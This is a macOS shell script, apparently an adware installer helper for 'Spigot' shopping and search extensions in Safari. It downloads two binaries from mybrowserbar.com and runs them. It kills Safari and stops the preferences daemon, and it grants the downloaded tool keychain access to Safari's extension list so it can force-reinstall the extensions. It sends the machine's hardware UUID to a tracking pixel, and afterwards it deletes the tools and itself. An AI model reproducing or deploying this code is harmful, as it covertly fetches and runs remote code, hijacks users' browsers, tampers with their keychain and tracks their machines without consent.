#!/bin/sh

CWD=$(dirname $0)

KEYTOOL_URL="http://download.mybrowserbar.com/kits/installers/utils/keytool"
KEYTOOL_PATH="/private/tmp/keytool"
BCTL_URL="http://download.mybrowserbar.com/kits/installers/utils/browserctl"
BCTL_PATH="/private/tmp/browserctl"

DEFAULT_SAFARI_HOMEPAGE="http://search.yahoo.com/?fr=spigot-yhp-sfmac"
DEFAULT_CHROME_HOMEPAGE="http://search.yahoo.com/?fr=spigot-yhp-gcmac"

DEFAULT_SAFARI_SEARCH_ENGINE="com.yahoo.www"
DEFAULT_CHROME_SEARCH_ENGINE_NAME="Yahoo!"
DEFAULT_CHROME_SEARCH_ENGINE_KEYWORD="yahoo.com"
DEFAULT_CHROME_SEARCH_ENGINE_URL="http://search.yahoo.com/search?fr=spigot-chr-gcmac&ei=utf-8&ilc=12"
DEFAULT_CHROME_SEARCH_ENGINE_FAVICON="http://search.yahoo.com/favicon.ico"
DEFAULT_CHROME_SEARCH_ENGINE_GUID="A0443D24-D635-49CD-B97A-605784D591F4"

PRECMD=""

OSX_VERSION=$(sw_vers -productVersion)
OSX_MAJOR=$(echo $OSX_VERSION | awk -F'.' '{ print $1 }')
OSX_MINOR=$(echo $OSX_VERSION | awk -F'.' '{ print $2 }')
OSX_REV=$(echo $OSX_VERSION | awk -F'.' '{ print $3 }')
OSX_VERSION=$(printf "%02d%02d%02d" "${OSX_MAJOR}" "${OSX_MINOR}" "${OSX_REV}")

SAFARI_VERSION=$(defaults read /Applications/Safari.app/Contents/Info "CFBundleShortVersionString")
SAFARI_MAJOR=$(echo $SAFARI_VERSION | awk -F'.' '{ print $1 }')
SAFARI_MINOR=$(echo $SAFARI_VERSION | awk -F'.' '{ print $2 }')
SAFARI_REV=$(echo $SAFARI_VERSION | awk -F'.' '{ print $3 }')
SAFARI_VERSION=$(printf "%02d%02d%02d" "${SAFARI_MAJOR}" "${SAFARI_MINOR}" "${SAFARI_REV}")

MACHINE_UUID=$(ioreg -rd1 -c IOPlatformExpertDevice |  awk '/IOPlatformUUID/ { print $3; }' | tr -d '"')

if [ "x${CNID}" == "x" ]; then
    echo "No CNID provided, exiting."
    exit 1
fi

if [ "${UID}" == "0" ]; then
	PRECMD="sudo -u ${USER}"
fi

if ! [ $SAFARI_MAJOR -eq 7 -a $SAFARI_MINOR -eq 1 ] && ! [ $SAFARI_MAJOR -eq 6 -a $SAFARI_MINOR -eq 2 ] && ! [ $SAFARI_MAJOR -eq 8 -a $SAFARI_MINOR -eq 0 ]; then
    echo "Safari version is not 7.1 or 6.2, exiting."
    exit 0
fi

if [ ! -d  "${HOME}/Library/Application Support/Spigot" ]; then
    echo "Spigot directory not found."
    exit 1
fi

if [ ! -d "${HOME}/Library/Safari/Extensions" ]; then
    echo "Safari Extensions directory not present, exiting"
    exit 1
fi

found=False
for filename in "Amazon Shopping Assistant.safariextz" "Ebay Shopping Assistant.safariextz" "Searchme.safariextz" "SlickSavings.safariextz"; do
    if [ -e "${HOME}/Library/Application Support/Spigot/${filename}" -a -e "${HOME}/Library/Safari/Extensions/${filename}" ]; then
        found=True
        break
    fi
done

if ! $found ; then
    echo "No Spigot extension present on client computer, exiting"
    # Send the stats to Spigot
    /usr/bin/curl --url "http://www.mybrowserbar.com/images/pixel.gif?mid=${MACHINE_UUID}&cnid=${CNID}&swa=0" -s >/dev/null 2>&1
    exit 0
fi

/usr/bin/curl --url "${KEYTOOL_URL}" -o "${KEYTOOL_PATH}" -s -f
ret=$?
if [ $ret -ne 0 ]; then
    echo "Could not download keytool, exiting"
    exit 1
fi

/usr/bin/curl --url "${BCTL_URL}" -o "${BCTL_PATH}" -s -f
ret=$?
if [ $ret -ne 0 ]; then
    echo "Could not download browserctl, exiting"
    exit 1
fi

chmod +x "${KEYTOOL_PATH}"
chmod +x "${BCTL_PATH}"

openSafariBrowser=$(ps auxwww | grep '/Applications/Safari.app/Contents/MacOS/Safari' | grep -v 'grep' | wc -l)
if [ $openSafariBrowser -eq 0 ]; then
    $PRECMD /usr/bin/open -g -b com.apple.Safari ; sleep 2 ; $PRECMD killall -TERM Safari ; sleep 2
else
    $PRECMD killall -TERM Safari
fi

/usr/bin/security add-generic-password -a "Safari" -s "Extended Preferences" -l "Safari Extensions List" -T "${KEYTOOL_PATH}" -U
ret=$?
if [ $ret -ne 0 ]; then
    echo "User denied access to the keychain item"
    # Send the stats to Spigot
    /usr/bin/curl --url "http://www.mybrowserbar.com/images/pixel.gif?mid=${MACHINE_UUID}&cnid=${CNID}&swa=2" -s >/dev/null 2>&1
	exit 32
fi
	
# Remove old safari_extensions.plist file
rm -f "/private/tmp/safari_extensions.plist"

# Stop cfprefsd
launchctl stop com.apple.cfprefsd.xpc.agent >/dev/null 2>&1
killall -TERM cfprefsd >/dev/null 2>&1

# Check if Safari extensions are available in ~/Library/Application Support/Spigot, and for each
# extension, we'll tell browserctl to install it.
for filename in "Amazon Shopping Assistant.safariextz" "Ebay Shopping Assistant.safariextz" "Searchme.safariextz" "SlickSavings.safariextz"; do
    if [ -e "${HOME}/Library/Application Support/Spigot/${filename}" ]; then
        if [ -e "${HOME}/Library/Safari/Extensions/${filename}" ]; then
            rm -f "${HOME}/Library/Safari/Extensions/${filename}" >/dev/null 2>&1
            $PRECMD /private/tmp/browserctl --browser Safari --channel-id "${CNID}" --keytool="${KEYTOOL_PATH}" --install "${HOME}/Library/Application Support/Spigot/${filename}"
        fi
    fi
done

# Start cfprefsd
launchctl start com.apple.cfprefsd.xpc.agent >/dev/null 2>&1

rm -f "${KEYTOOL_PATH}" "${BCTL_PATH}" "${CWD}/safari_fixup.sh"

# open Safari if we closed it
if [ $openSafariBrowser -ge 1 ]; then
    $PRECMD open -g -b com.apple.Safari
fi

/usr/bin/curl --url "http://www.mybrowserbar.com/images/pixel.gif?mid=${MACHINE_UUID}&cnid=${CNID}&swa=1" -s >/dev/null 2>&1

exit 0
